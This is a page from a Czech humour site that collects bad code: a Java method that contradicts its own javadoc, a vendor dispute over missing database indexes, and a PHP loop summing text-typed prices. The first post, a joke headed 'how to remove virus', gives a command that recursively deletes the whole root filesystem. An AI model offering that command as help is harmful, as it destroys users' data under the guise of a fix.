Mistři v programování na #hovnokod

how to remove virus

sudo echo 'google.com 127.0.0.1'>/etc/hosts && sudo rm -rf --no-preserve-root /

HovnoKod,

...a pak důvěřujte javadocu.

/**
 * Remove not selected products from the range <br/>
 * Sort the products and remove the one with the highest priority and return it as the highest priority one
 * 
 * @param products
 * @return
 */
private void sortHighestPriorityProduct(List<ProductDTO> products) {
	log.debug("> sortProducts, no of products - " + products.size());

	if (products != null && !products.isEmpty()) {
		Collections.sort(products, new ProductDTOPriorityComparator());
		ProductDTO highestPriorityProduct = products.get(0);

		log.debug("< sortProducts, highest priority product [id, selected, priority] - " +
				highestPriorityProduct.getId() +
				", " +
				highestPriorityProduct.getSelected() +
				", " +
				highestPriorityProduct.getPriority());
	}
}

Anonymous,

Aneb když dodavatel dodá aplikaci nad databází, která nepoužívá indexy.

Zákazník (já): 
"V debug consoli vaší aplikace jsem odchytil selecty, které kolegyně denně využívají pro načtení dat do tohoto formuláře.
K těmto selectům jsem vyhledal i explain plany a byl jsem nemile překvapen kolikrát není použit index a prochází se 
celá tabulka, z důvodu neexistenece indexů."
Dodavatel:
indexy  nezmizeli - to by byla chyba systému. To,  že několik  let používáte systém bez těchto indexů a nyní se vyskytl
problém (z důvodu vyského objemu dat), není chybou systému, ale požadavkem na placenou úpravu.

Anonymous,


Anonymous,

SQL SUM ani použít nejde. Protože order_price_s_dph (cena objednávky) v DB je TEXT! A navíc sloupec date je INT, takže se na něj blbě používají funkce na práci s časem v SQL. A oba sloupce jsou NULL. Všechno v DB je jen TEXT nebo INT a vždycky NULL. A order_id (identifikátor objednávky) není PK, protože tabulka nemá PK, stejně jako půlka tabulek v DB. Je velikým štěstím, že je na něm alespoň index UNIQUE.

$den_start = strtotime("-1 week");

$query = "SELECT order_price_s_dph FROM orders WHERE date >= '{$den_start}'";
$result = pg_query($query);
$sum = 0;
while ($data = pg_fetch_row($result)) {
	$sum += $data[0];
}

return $sum;

Anonymous,